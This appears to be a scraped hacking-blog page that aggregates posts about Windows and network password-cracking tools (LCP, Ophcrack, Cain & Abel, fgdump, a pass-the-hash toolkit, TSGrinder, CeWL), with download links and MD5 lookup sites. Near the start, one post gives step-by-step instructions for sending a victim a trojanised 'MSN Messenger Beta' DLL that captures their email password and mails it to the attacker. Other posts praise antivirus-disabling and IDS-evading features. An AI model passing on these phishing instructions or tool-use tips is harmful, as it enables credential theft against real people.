Password auditing and recovery tool for Windows NT/2000/XP/2003. Accounts information import: import from local computer, import from remote computer, import from SAM file, import from .LC file, import from .LCS file, import from PwDump file, import from Sniff file. Passwords recovering by dictionary attack, brute force attack, hybrid of dictionary and brute force attacks. Brute force session distribution: sessions distribution, sessions combining. Hashes computing: LM and NT hashes computin...

A good free alternative to L0phtcrack.

Free Download


LCP Download

Read more on this article...

ery simple and really without any kind of virus, trojan. Please scan your files before you open it. There is also a video it is in a flv. flash format. Watch the video there is explaining you all what you have to do.
Just I want to explain it also by words here, maybe someone cant open the video file.
First of all download the file, it is a .rar file.
The link is:
http://www.ziddu.com/download.php?uid=ZbOinJmoZq%2BenOKnYqqhkZSoX6qcm5eu2

after you download, watch the video or not, how you like.
There are 2 files, open first "Gen File" write your email (because you will get the passwords there. After you generate your file in the folder you will see one .dll file, this you can send it with msn.exe together (make zip or rar) to any of hotmail, windowslive, msn adress. Tell to the victim "hey this is a new Msn Messenger Beta" or somethink like this. He/she will open the file, will write email+password, sign in of course. And in this Moment you will get the mail (after 5-10 Minutes).
EnJoY, thank you for your communication, cooperation and connection. Read more on this article...

pRogs to Crack Different Types of hashes

1-John the Ripper Win32

http://passcrack.spb.ru/modules/Files/Public/john-17w.zip

2-RainbowCrack tools

http://passcrack.spb.ru/modules/Files/Public/raincrck.rar

3-MD5Crack

http://passcrack.spb.ru/modules/Files/Public/MD5Crack.exe

4-PasswordsPro
MD4, MD5, SHA-1 and MySQL hashes. Generates 10 types of hashes: MySQL, MD4, MD4 (Base64), MD5, MD5 (Base64), MD5 (Unix), MD5 (APR), MD5 (RAdmin 2.x), SHA-1 and SHA-1 (Base64).

http://www.insidepro.com/download/saminside.zip

5-MD5Inside

http://passcrack.spb.ru/modules/Files/Public/md5inside.zip

6-Md5 Tool Box

http://members.lycos.co.uk/b5ot5/md5/md5toolbox10.rar

7-john the riper

http://www.zshare.net/download/158815851581-157615851606157516051580-157516041580160816071606-zip.html

8-rainbowcrack-1.2-win

http://www.zshare.net/download/158815851581-157615851606157516051580-1575160415801583157516081604-zip.html

9-cain

http://www.zshare.net/download/158815851581-157615851606157516051580-cain-zip.html

10-MDCrack 1.8.3

http://c3rb3r.openwall.net/mdcrack/download/MDCrack-183.zip

11-MDcrackEasyLoader

http://c3rb3r.openwall.net/mdcrack/download/MDcrack%20EasyLoader.zip


12-Passw0rd Craking All in One 2oo7

Brutus AET2 Password Crack
-Cain & Abel 4.2
-Hydra 5.3 [Brute Force Pass Cracker]
-John The Ripper 1.71 Win
-MD5 Cracker
-MD5 Password Cracker
-Medusa Password Cracking 1.1 per Linux
-OphCrack 2.3.3

http://rapidshare.com/files/16902278/Pk-o7.rar

pass : d4rk-r3v-t34m

Now Site For Crack MD5

MD5 Reverse Lookup
http://md5lookup.com/

------------------------------------


xMD5
http://www.xmd5.org/index_en.htm

------------------------------------

Stephen D Cope
http://nz.md5.crysm.net/

------------------------------------

Gdata
http://gdataonline.com/seekhash.php

------------------------------------

md5(); (puRe)
http://md5.rednoize.com/

------------------------------------

Ice Breaker
http://ice.breaker.free.fr/

------------------------------------

milw0rm
http://www.milw0rm.com/md5/insert.php

------------------------------------

shm
http://shm.hard-core.pl/md5/

------------------------------------

hash Checker
http://www.hashchecker.com/?_sls=add_hash

------------------------------------

OPHCRACK
http://lasecwww.epfl.ch/%7Eoechslin/...ts/ophcr ack/

------------------------------------

Ben Ramsey
http://md5.benramsey.com/

------------------------------------

altervista
http://md5.altervista.org/

------------------------------------

xpzone
http://md5.xpzone.de/

------------------------------------

SecurityStats
http://www.securitystats.com/tools/hashcrack.php


------------------------------------

Cmd5

WwW.Cmd5.Com

------------------------------------

Now Finsh

Mr.Shares

WwW.V99x.Com/vb

Read more on this article...

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Ophcrack 2.3. released - 2006-07-21
Support for NTLM Hashes added.

Improved loading of tables into cache.


Features
» Runs on Windows, Linux and Mac OS X (intel).
» Cracks LM and NTLM hashes.
» Free tables available for alphanumeric LM hashes.
» Loads hashes from local SAM, remote SAM.
» Loads hashes from encrypted SAM recovered from a Windows partition.

Ophcrack LiveCD
The ophcrack LiveCD contains a full linux system (SLAX), ophcrack for linux and rainbow tables for alphanumerical passwords.

The liveCD cracks passwords automatically, no installation necessary, no admin passwort necessary (as long as you can boot from cd).

Available table sets
Mixed-case alphanumerical LMHashes (SSTIC tables)
These tables are distributed freely under the GNU general public license (GPL) and come in two sizes:
SSTIC04-5k is a large one (720MB) for machines having atleast 500M of RAM.

SSTIC04-10k is a smaller table set (388MB) for machines having less than 500M of RAM.
The tables can be downloaded from the opchrack project page at LASEC, EPFL
Both table sets crack mixed case alhpnumerical passwords of up to 14 characters, but because of the time-memory trade-off, the larger table set can crack the passwords much faster, if you have enough to hold all the tables in RAM. The success rate of these tables is 99.9%
LM Hashes with 33 special chars (WS20k tables)
This table set cracks 96% percent of LM Hashes of passwords of length up to 14 characters made of the following characters :

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN OPQRSTUVWXYZ!"#$%&' ()*+,-./:;&<=>?@[\]^_`{|}~ (including the space character)
This table set is available from Objectif Securité and from Forensic & Security Services in the US.

NT Hashes with 33 special chars (NTHASH tables)
This table set crack 99% of NT Hashes of the following passowrds:
» passwords of length 6 or less composed by characters in this set:

0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN OPQRSTUVWXYZ!"#$%&' ()*+,-./:;&<=>?@[\]^_`{|}~ (including the space character)
» alphanumeric passwords of length 7 (lower- and uppercase)
» alphanumeric passwords of length 8 (lowercase only)

This table set is available from Objectif Securité and from Forensic & Security Services in the US.

Free Download


Fastest Windows Password Cracker

Read more on this article...

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Free Download


Cain and Able Passoword Cracker

Read more on this article...

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Free Download



Cain and Able Passoword Cracker

Read more on this article...

Quite a few people seem to be interested in this tool, so here is the latest revision - Inguma 0.0.6.

For those that don’t know, Inguma is a free penetration testing and vulnerability discovery toolkit entirely written in python. Framework includes modules to discover hosts, gather information about, fuzz targets, brute force usernames and passwords, exploits, and a disassembler.

In this new version various things have been added like new modules and improvements in the existing ones. For example the Oracle modules. The Oracle payloads now uses the Cursor Injection method when possible so CREATE PROCEDURE system privilege is not needed to become DBA.

The support for InlineEgg, added in version 0.0.5.1, have been removed and a new completely free library have been added (PyShellCodeLib).

The static analysis framework OpenDis have been enhanced and now you can use the API exposed by OpenDis to write your own binary static analysis tools. As an example of the API, a tool to make binary diffs have been added. Take a look to the file $INGUMA_DIR/dis/asmdiff.py and to the README stored in the same directory.

New 5 exploits for Oracle Databases have been added and the module “sidguess” have been enhanced to retrieve the SID of the database instance from the Enterprise Manager/Database Control banner when possible.

The new modules added to the discover, gather and brute sections are the following:

* brutehttp: A brute forcer for HTTP servers.
* extip : A tool to known your external IP address. Very useful to check anonymous proxies.
* nmbstat : A tool to gather NetBIOS information.
* ipscan : A tool to make IP protocol scans. The tool check what IP protocols are enabled in the target.
* arppoison: A tool to poison target’s ARP cache

Free Download


Inguma 0.0.6

[Source: Darknet ]

Read more on this article...

Bruter 1.0 BETA 1 has been released. Bruter is a parallel login brute-forcer. This tool is intended to demonstrate the importance of choosing strong passwords. The goal of Bruter is to support a variety of services that allow remote authentication.

PROTOCOL SUPPORT

It currently supports the following services:

* FTP
* HTTP (Basic)
* HTTP (Form)
* IMAP
* MSSQL
* MySQL
* POP3
* SMB-NT
* SMTP
* SNMP
* SSH2
* Telnet

Free Download


Bruter_1.0_beta1.zip

[Source: Darknet ]

Read more on this article...

I quite often get people asking me where to get Wordlists, after all brute forcing and password cracking often relies on the quality of your word list.

Do note there are also various tools to generate wordlists for brute forcing based on information gathered such as documents and web pages (such as Wyd - password profiling tool) These are useful resources that can add unique words that you might not have if your generic lists.

Also add all the company related words you can and if possible use industry specific word lists (chemical names for a lab, medical terms for a hospital etc).

And always brute force in the native language.

You can find a simple wordlist generator in PERL here.

Although old, one of the most complete wordlist sets is here (easily downloadable by FTP too):

Oxford Uni Wordlists

There’s a good set of lists here including many european languages and topic specific lists:

The Argon Wordlists

Here we have 50,000 words, common login/passwords and African words (this used to be a great resource):

Totse Word Lists

There’s a good French word list here with and without accents, also has some other languages including names:

Wordlists for bruteforce crackers

One of the most famous lists is still from Openwall (the home of John the Ripper) and now costs money for the full version:

Openwall Wordlists Collection

Some good lists here organized by topic:

Outpost9 Word lists

Packetstorm has some good topic based lists including sciences, religion, music, movies and common lists.

Packetstorm word lists

Free Download

• Medusa 1.4 - Parallel Password Cracker
• THC-Hydra - The Fast and Flexible Network Login Hacking Tool
• Cain & Abel - Password Cracker with Network Sniffing
• JTR (Password Cracking) - John the Ripper 1.7 Released

[Source: Darknet ] Read more on this article...

The major change is both tools now support 64-bit targets! Good news for us.

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

fgdump is a more powerful version of pwdump6. pwdump tends to hang and such when antivirus is present, so fgdump takes care of that by shutting down and later restarting a number of AV programs. It also can dump cached credentials and protected storage items, and can be run in a multithreaded fashion very easily.

I strongly recommend using fgdump over pwdump6, especially given that fgdump uses pwdump6 under the hood! You’ll get everything pwdump6 gives you and a lot more.

fgdump now has:

* Better 32/64 bit detection. This is not as easy as it sounds, at least not remotely! If someone has a sure-fire way for 100% reliably detecting the target OS, please let me know. In the mean time, if fgdump is unsure, it will report it and default to 32-bit.
* The -O [32|64] flag will manually override the target OS architecture. So, for example if fgdump is reporting a host as 32-bit and you KNOW it is 64-bit, you can use -O 64 (or vice-versa, of course). Note that this flag will apply to ALL hosts you are dumping! You might want to single out any hosts you need to override.

Free Download


Get pwdump here

Get fgdump here

Read more here and here.

[Source: Darknet ] Read more on this article...

This is a tool that has been around quite some time too, it’s still very useful though and it’s a very niche tool specifically for brute forcing Windows Terminal Server.

TSGrinder is the first production Terminal Server brute force tool, and is now in release 2. The main idea here is that the Administrator account, since it cannot be locked out for local logons, can be brute forced. And having an encrypted channel to the TS logon process sure helps to keep IDS from catching the attempts.

TSGringer is a “dictionary” based attack tool, but it does have some interesting features like “l337″ conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try a
username/password combination within a particular connection.

Free Download


tsgrinder-2.03.zip

Note that the tool requires the Microsoft Simulated Terminal Server Client tool, “roboclient,” which may be found here:

roboclient.zip

[Source: Darknet ]

Read more on this article...

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!).

* Support for XP SP 3 for whosthere/iam (whosthere-alt/iam-alt work on xp sp3 without requiring any update)
* New -t switch for whosthere/whosthere-alt: establishes interval used by the -i switch (by default 2 seconds).
* New -a switch for whosthere/iam: specify addresses to use.
* New -r switch for iam/iam-alt: Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)
* genhash now outputs hashes using the LM HASH:NT HASH format

Free Download


pshtoolkit_v1.4-src.tgz

Windows Binaries

pshtoolkit_v1.4.tgz

[Source: Darknet ]

Read more on this article...

SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol.

The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts.

If you don’t have OpenSSL installed or encounter any building problems try ‘make no-openssl’ to build with integrated MD5 function (which is slower than the OpenSSL implementation).

Usage

Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file. See ’sipdump -h’ for options.

Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated See ’sipcrack -h’ for options.

Free Download


SIPcrack-0.3

[Source: Darknet ] Read more on this article...

So it turns out you don’t need any fancy password cracking software like John the Ripper or Cain and Abel you just need a handful of £5 gift vouchers for Marks and Spencers!

But we had discussed this in part before, some people will give out their passwords if you just ask, some if you offer chocolate and this time in the guise of a ’survey’ for a gift voucher.

Although the majority (60 percent) of 207 London residents were happy to hand over computer password data which might be useful to potential ID thieves in exchange for a £5 M&S gift voucher, the public at large take a hard line on firms who fail to keep tight hold of customer data.

In exchange for the voucher, a number of those quizzed during a street survey in Covent Garden earlier this week went on to explain how they remember their password and which online websites (from a range of email, shopping, banking and social networking sites) they most frequently use. A sizeable chunk of those surveyed (45 per cent) said they used either their birthday, their mother’s maiden name or a pet’s name as a password.

Perhaps it’s just as well that stolen identities are worth a lot less than £5, fetching as little as 50p on the underground black market, according to Symantec.

It seems like rather than giving out the actual password they answered questions put together in such a way that a profiler could easily work out what their password was and which sites they used it on.

Pretty sneaky methinks, it’s a good way to test how paranoid people are about their data security…it’s ironic really seeing how much they complain but at the end of it they are their own worst danger.

ine in ten (89 per cent) of 1,000 Brits quizzed during a wider survey, commissioned by Symantec and price comparison site moneysupermarket.com, expressed the opinion that “reckless and repeated” data breaches ought to be punished by criminal prosecutions. Sanctions should include the ability to incarcerate directors of negligent firms in jail. Eight out of ten of those quizzed agreed there should be a “one strike and you’re out” rule for data loss.

Almost four in five of those polled reckon their personal data is not secure in the hands of companies that hold it, a finding that probably stems from the steady drip of data breach stories that have followed from the massive HMRC child benefit lost disc bungle last year. Three in four consumers are concerned about the amount of information organisation hold on them, regardless of whether or not this information is held online or offline. Online payments were perceived as the single greatest risk for losing data.

The general public are pretty harsh too when it comes to dishing out punishment, but then again that is human nature and that is why there’s jury service.

It’s not surprising either that people have very little faith in data stored by the government and their greatest fear is carrying out online transactions.

I think we all know well enough to keep ourselves safe…but sadly as always it seems the rest of the world don’t.

[Source: Darknet ]


Read more on this article...

It seems that people are truly shocked when their identities get exposed, and the vast majority use the same single password for ALL of their online accounts. That’s just crazy!

A ‘kind-hearted’ hacker recently exposed a bunch of online accounts (with passwords) to gain himself more status in a hacker forum (l33t sk1llz dudebro!).

WHEN Australian web users learned from the Herald that details of their online accounts had been posted on a hacker’s website for all to see, they were suspicious, then alarmed, then furious at the hacker who compromised their identities.

Email addresses, matched with user names and passwords for online memberships, were offered by the hacker for anyone wanting to try their hand at identity theft or even financial fraud.

The Herald stumbled across the site during its investigations into online fraud. “It’s obviously startling,” said Lachlan Yee, a research associate in biotechnology at the University of NSW and one of those whose details were exposed by the hacker.

Identity fraud is big business now and generally online info is hot, if you have someones e-mail address and general password…you can withdraw all their money from Paypal for example.

You may be able to login into their online bank account if the details are contained in their e-mail and so on.

There are endless possibilities for the creative.

Many of the accounts were generic accounts for Hotmail, Yahoo! and Gmail. But more than 50 were clearly Australian-based, and all were alerted to the breach. “To be honest the whole thing has me a bit spooked,” said one victim, Jonathan Eyles.

“They definitely got me,” said Eyles, a graphic designer in Ultimo. He said the compromised password had been used for many purposes, although online banking was not one of them.

A Victorian man who asked that only his first name, Ben, be used, said he would need to change passwords for about 20 sites because of the breach.

If people want a solution I suggest they use something like this - passhash - they can still have one secure, strong master password but then have unique hashed passwords for every site they use.

This has the advantage that if one site is compromised (and they aren’t using hashed passwords in the DB - it’s stored in plaintext) the hacker won’t have your password to every site as they will all be unique.


[Source: Darknet ]
Read more on this article...

We have covered quite a lot of Password Cracking tools and it’s not often a new one comes out, this one is for quite a specialised purpose (not a general all-purpose password cracker like John the Ripper or Cain & Abel), although you do need to use it alongside JTR.

This tool is for instantly cracking the Microsoft Windows NT Hash (MD4) when the LM Password is already known, you might be familiar with LM Cracking tools such as LCP.

The main problem is you’ve got the LM password, but it’s in UPPERCASE because LM hashes are not case sensitive, so you need to find the actual password for the account.

Example : Password cracker output for “Administrator” account

* LM password is ADMINISTRAT0R.
* NT password is ?????????????.

We aren’t lucky because the case-sensitive password isn’t “administrat0r” or “Administrat0r”. So you cannot use this to connect to the audited Windows system.

This password contains 13 characters but launching my password cracker on the NT hash is a waste of time and there is a poor chance of success.

Note :

* Password length : 13 characters.
* Details : 1 number + 12 case-sensitives letters.
* Possibilities : 2^12 = 4096 choices.

In this example, lm2ntcrack will generate the 4096 possibilities for the password ADMINISTRAT0R and, for each one, the associated NT MD4 hash. Then, search for matching with the dumped hash.

Free Download


lm2ntcrack-current.tgz

[Source: Darknet ]

Read more on this article...

Now this is an interesting twist on an oldschool method of hacking, the monitoring of electromagnetic radiation.

You’d think it’d be easier to sniff the traffic from a wireless keyboard, but generally it’s not as they tend to be encrypted. Where as the electromagnetic radiation given off by a wired keyboard is not shielded or protected it any way.

All you need to do is have the equipment and the know-how to decipher it.

Swiss researchers have demonstrated a variety of ways to eavesdrop on the sensitive messages computer users type by monitoring their wired keyboards. At least 11 models using a wide range of connection types are vulnerable.

The researchers from the Security and Cryptography Laboratory at Ecole Polytechnique Federale de Lausanne are able to capture keystrokes by monitoring the electromagnetic radiation of PS/2, universal serial bus, or laptop keyboards. They’ve outline four separate attack methods, some that work at a distance of as much as 65 feet from the target.

In one video demonstration, researchers Martin Vuagnoux and Sylvain Pasini sniff out the the keystrokes typed into a standard keyboard using a large antenna that’s about 20 to 30 feet away in an adjacent room.

It appears to work on both the older PS/2 keyboards and new USB keyboards and even laptop keyboard from a distance of up to 65 feet! That’s easily far enough to jack the data from a carpark, adjacent office or nearby hotel room.

I’d imagine the equipment required is quite bulky though.

“We conclude that wired computer keyboards sold in the stores generate compromising emanations (mainly because of the cost pressures in the design),” they write here. “Hence they are not safe to transmit sensitive information.”

No doubt, electromagnetic eavesdropping dates back to the mid 1980s, if not earlier. But Vuagnoux says many of today’s keyboards have been adapted to prevent those attacks from working. The research shows that even these keyboards are vulnerable to electromagnetic sniffing.

The video demonstrations show a computer that reads input from antennas that monitor a specified frequency. In both cases, the computer was able to determine the keystrokes typed on keyboards connected to a laptop and power supply and LCD monitors were disconnected to prevent potential power transmissions or wireless communications. Vuagnous said in an email that the attacks would still work even if the power supplies and monitors were plugged in.

It seems the modifications made to keyboards to prevent this kind of sniffing has either been removed to save cost or was never tested properly in the first place. Read more on this article...

BarsWF is basically an MD5 cracking tool and at the moment, is currently the fastest. Right now on nVidia 9600GT/C2D 3Ghz CUDA version does 350 M keys/sec, SSE2 version does 108 M keys/sec. You may check benchmarks of all known good MD5 bruteforcers here.

Changes in 0.8

* Added checks for errors when calling CUDA kernel.
* Now you can specify custom characters for charset using -X switch.
* You may specify minimal password length using -min_len.
* Save/restore feature added. State is being stored to barswf.save every 5 minutes or on exit. You may continue computation using -r switch. You may manually edit .save file to distribute job on several computers (but this is up to you - it is quite simple and non-documented ). BarsWF will also write found password into barswf.save at the end.
* Improved speed for cards GTX260, GTX280, 8800GT, 9600GSO, 8800GS, 8800GTS - by approximately 10%, all other cards will get just 1-2%.

System Requirements

* CUDA version only:nVidia GeForce 8xxx and up, at least 256mb of video memory.
* LATEST nVidia-driver with CUDA support.Standard drivers might be a bit older (as CUDA 2.0 is still beta)
* CPU with SSE2 support (P4, Core2Duo, Athlon64, Sempron64, Phenom).
* Recommended 64-bit OS (WinXP 64 or Vista64). 32-bit version is also available.

FREE DOWNLOAD


CUDA:
BarsWF CUDA x64
BarsWF CUDA x32

SSE2:
BarsWF SSE x64
BarsWF SSE x32

[Source: Darknet ]

Read more on this article...

You may remember some time back we did a fairly exhaustive post on Password Cracking Wordlists and Tools for Brute Forcing.

Wyd the Password Profiling Tool also does something similar to AWLG but it’s a PERL script rather than being based online.

AWLG

The Associative Word List Generator (AWLG) is a tool that generates a list of words relevant to some subjects, by scouring the Internet in an automated fashion.

Inclusion Example: A search string including the words (without quotes): “steve carell” would give us a word list with lots of words associated with the actor Steve Carell. This includes all of the words from his MySpace page, words from the Wikipedia article on him, etc.

Exclusion Example: We know that Steve Carell is an actor for lots of things, including a show called “The Office”. A search string: “steve carell” with omissions: “office” and “michael scott” would find words from websites that mention Steve Carell, but do not mention the word “office”, “michael”, or “scott”.

Privacy policy

AWLG.org does not record any transmitted search strings or user information. AWLG.org does record statistical information such as total site usage, total number of words generated per search, etc.

You can get cracking with AWLG here:

http://awlg.org/index.gen

[Source: Darknet ]
Read more on this article...

It seems to be trendy lately to make tools which can create custom or more specific word lists for password cracking, just last week we posted about the web application The Associative Word List Generator (AWLG), which crawls the whole web to look for associated words with a given topic.

This application is more towards creating custom word lists from a specific domain by crawling it for unique words. Basically you give the application a spidering target website and it will collect unique words. The application is written in Ruby and is called CeWL, the Custom Word List generator. The app can spider a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.

IF you combine the info output by CeWL and AWLG with the standard wordlists for password cracking - you should have a fairly comprehensive set.

By default, CeWL sticks to just the site you have specified and will go to a depth of 2 links, this behaviour can be changed by passing arguments. Be careful if setting a large depth and allowing it to go offsite, you could end up drifting on to a lot of other domains. All words of three characters and over are output to stdout. This length can be increased and the words can be written to a file rather than screen so the app can be automated.

Version 2 of CeWL can also create two new lists, a list of email addresses found in mailto links and a list of author/creator names collected from meta data found in documents on the site. It can currently process documents in Office pre 2007, Office 2007 and PDF formats. This user data can then be used to create the list of usernames to be used in association with the password list.

Installation

CeWL needs the rubygems package to be installed along with the following gems:

* http_configuration
* mime-types
* mini_exiftool
* rubyzip
* spider

FREE DOWNLOAD


cewl_2.0.tar.bz2

[Source: Darknet ] Read more on this article...